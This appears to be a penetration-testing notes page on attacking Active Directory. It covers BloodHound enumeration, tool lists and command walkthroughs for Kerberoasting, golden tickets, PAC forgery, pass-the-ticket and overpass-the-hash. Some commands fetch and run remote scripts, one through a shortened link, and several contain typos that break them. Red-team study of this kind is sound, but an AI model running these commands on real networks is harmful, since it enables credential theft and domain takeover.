Attacking Active Directory
Where can we go, once we are in?
AD Guides and Reference
https://mayfly277.github.io/assets/blog/pentest_ad_dark.svg - Another killer AD Mindmap.
The Active Directory Mapping tool. Used by Red and Blue teamers to map out their Active Directory environment and look for the shortest path to compromise Domain Admin.
Operator Handbook: Bloodhound - pg. 4
Bloodhound Basics
Uses graph theory to reveal the hidden and unintended relationships in an AD environment.
Easily identity highly complex attack paths - can be used by defenders ad well.
Bloodhound works by running an ingestor that queries AD for users, groups and hosts. It will then connect to each system to enumerate logged in users sessions and permissions. ***WARNING: VERY LOUD*** There is a stealth option but its limited.
Two Verisons
BloodHound - Powershell based older module
Sharphound - C# verision that is much faster and stable. Standalone binary or imported as a Powershell script.
Script version wil use reflection and assembly.load to load the compiled ingestor into memory
Multiple connection Methods you might need to specify
Group - group membership info
LocalGroup - Collect local admin info
Session - session info
SessionLoop - Continuously collection session info until killed
Trust - enumerate domain trust data
ACL - collect ACL data
ComputerOnly - local admin and session data
GPOLocalGroup - collects local admin info via group policy objects
LoggedOn - Collects session info using privileged methods (needs admin)
ObjectProps - collects node property info for users and devices.
Default - collects Group membership, local admin,sessions, and domain trusts
Commands
Bloodhound.ps1[sharphound.ps1] Invoke-Bloodhound -CollectionMethod [method of choice]
> Sharphound.exe -c [method of choice]
After bloodhound finishes, it will drop the files on the victims system. Pull them on to your machine.
Next we need to start our correlation graph using Neo4j server and import the data
# apt-get install bloodhound
# neo4j console
Open browser to http://localhost:7474
connect to bolt://localhost:7687
username/pw = neo4j/neo4j
CHANGE PASSWORD
# sudo bloodhound
Database URL: bolt://127.0.0.1:7687
Username: neo4j
Password: newpassword
Upload data - all the created csv files
Neo4j allows for raw queries through its own language called Cypher
When using the ACL method, bloodhound will gather all permissions for users/objects
The info we gather from Access Control Entries describes allowed and denied permissions for users groups and comps.
Bloodhound 1.3 - the ACL attack path Update https://wald0.com/?p=112
Introducing the adversary resiliancy methodology http://bit.ly/2GYU7S7
AD Enumeration
https://attl4s.github.io/assets/pdf/Understanding_Active_Directory_Enumeration.pdf
ADExplorer by Sysinternals - An advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute.
ADRecon - ADRecon is a tool which extracts and combines various artifacts (as highlighted below) out of an AD environment.
ACLight -A tool for advanced discovery of Privileged Accounts - including Shadow Admins.
TruffleSnout - Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration.
Snaffler - It gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.
AD Exploitation
Credential Harvesting
Red Snarf - RedSnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques
Exploitation
CrackMapExec - CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
Rubeus - Rubeus is a C# toolset for raw Kerberos interaction and abuses.
Rubeus-GUI - GUI alternative to the Rubeus command line tool, for all your Kerberos exploit requirements
orpheus - Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
ActiveReign - ActiveReign, code name AR3, is a network enumeration and attack toolset designed for use on Windows Active Directory environments.
LAPSToolkit - Tool to audit and attack LAPS environments.
Powermad - PowerShell MachineAccountQuota and DNS exploit tools
Impacket scripts
GetTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.
GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user.
GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.
GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat.
GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
ticketConverter.py: This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa.
ticketer.py: This script will create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, ExtraSids, duration, etc.
raiseChild.py: This script implements a child-domain to forest privilege escalation
Kerberoasting
Any ticket can be requested by any user with kerberos, from the domain controller
Those tickets are encrypted with the NTLM hash of the associated service user.
If we can guess the password to teh associated service user's NTLM hash, then we now know the password to the actual service account
Steps:
List all SPN services. These are the service accounts for which we are going to pull all the kerberos tickets
>setspn -T [domain] -F -Q */*
Next we target either a single user SPN or pull all the user Kerberos tickets into our user's memory
Single target
>powershell Add-Tpe -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArguementList “HTTP/[hostname].[domain].local”
All User tickets
>powershell Add-Tpe -AssemblyName System.IdentityModel; IEX (New-Object Net.WebClient).DownloadString("https://githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1") | ForEach-Object {try{New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArguementList $_.ServicePrincipalName}catch{}
And the powersploit tool to automate this!
Now we have our tickets imported into memory and we need to extract them.
Mimikatz Kerberoast export:
>powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2qx4kuH'); Invoke-Mimikatz -Command ‘’'''''kerberos::list /export'''''''
Once extracted and on our victims machine and we can start cracking them!
use tgsrepcrack.p
Creating your own tickets to Auth to any server
You can take the old krbtgt hash from the previous hash dump and promote yourself back to Domain admin, all with an unprivileged account
A few notes on krbtgt:
Do not reset the system generated password, it could break the whole domain
Even if you change every password for every domain admin, you can still become a DA
You can create Users and Groups that do not exist within the Golden ticket
What you need
Domain - on victim host type: whoami
Domain Admin user - On victim host type: net local group administrators /DOMAIN
Domain SID - whoami /user chop off the last dash and 4 digits
krbtgt - From previous hashdump, use the second half of the hash/the NTLM hash
Process
Run Smbexec, choose hashdump, and dump the domain controller
A log file will be created with the domain hashes. The one we need is the second part of the krbtgt hash
Return to original shell
Drop into mimikatz 2.0
use kiwi
Create golden ticket
>golden_ticket_create -u [domain admin suername] -d [domain] -k [krbtgt hash] -s [Domain SID] -t [location to Drop Golden Ticket]
Using the Golden ticket
Shell access with limited access
>session -i
Load mimikatz
>use kiwi
Check current Kerberos Tickets
> kerberos_ticket_list
Purge all Kerberos Tickets
>kerberos_ticket_purge
Local our Golden Ticket (stored in /opt/ticekt.txt in our vm)
>kerberos_ticket_use /opt/ticket.txt
Drop into a shell and read files off the DC
>shell
> dir \ \DC\c$
Once we are authed using the Golden ticket, we can send Domain admin commands using WMIC
Example: execute a ping commmand and write that to a file on a remote server
wmic /authority:"Kerberos:[attacker.domain] \[target hostname]" /node:[target hostname] process call create "cmd /c ping 127.0.0.1 > C:\log.txt
Privilege Attribute Certificate vulnerability
With basic information on a domain user you can move to a domain admin by editing the PAC
#git clone https://github.com/bidord/pykek /opt/pykek
# apt-get install krb5-user
# apt-get install rdate
# rdate -n [domain]
# echo [attacker IP][domain controller hostname] >> /etc/host
Next we need 4 pieces of information
-u username@domain (user@domain1)
-d domain controller [domain.controller.test]
-p password
-s SID (get SID with command “whoami /user”
Now that we have all the pieces
#cd /opt/pykek
#python ms12-068.py -d domain.controller.test -u user@domain1 -s [SID] -p [password
We have created a credential cache ticket and now we copy it where it needs to go
#cp TGT_user@domain1.ccache /tmp/krb5cc_0
Now you have access with
#smclient -k -W domain1 //domain.controller.test/c$ -k
https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
Kerberos Pass-The-Ticket
Start with writing all tickets to the folder from wihch it was executed.
>privilege :: debug
>sekurlsa::tickets /export
Now we import one of those as our tikets and drop back into mimikatz
>kerberos::ptt [0,ab9bf] [ticket info]
Overpass the Hash
Over abuse NTLM user hash to gain a full Kerberos TGT
The essence of the overpass the hash technique is to turn the NTLM hash into a Kerberos ticketand avoid the use of NTLM authentication. A simple way to do this is again with the sekurlsa::pth command from Mimikatz.
#mimikatz # sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
Abusing Delegation
Attacking Domain Trusts
Privileges and Permissions
Misconfigurations
Grouper - A PowerShell script for helping to find vulnerable settings in AD Group Policy.
aclpwn.py - Active Directory ACL exploitation with BloodHound
ADACLScanner - A tool with GUI or command linte used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory
RACE - RACE is a PowerShell module for executing ACL attacks against Windows targets.
DCShadow
Specific Vulnerabilities
Special AD Target
Unsupported OS
Microsoft SQL Server
Red Forest
Exchange
Last updated
Was this helpful?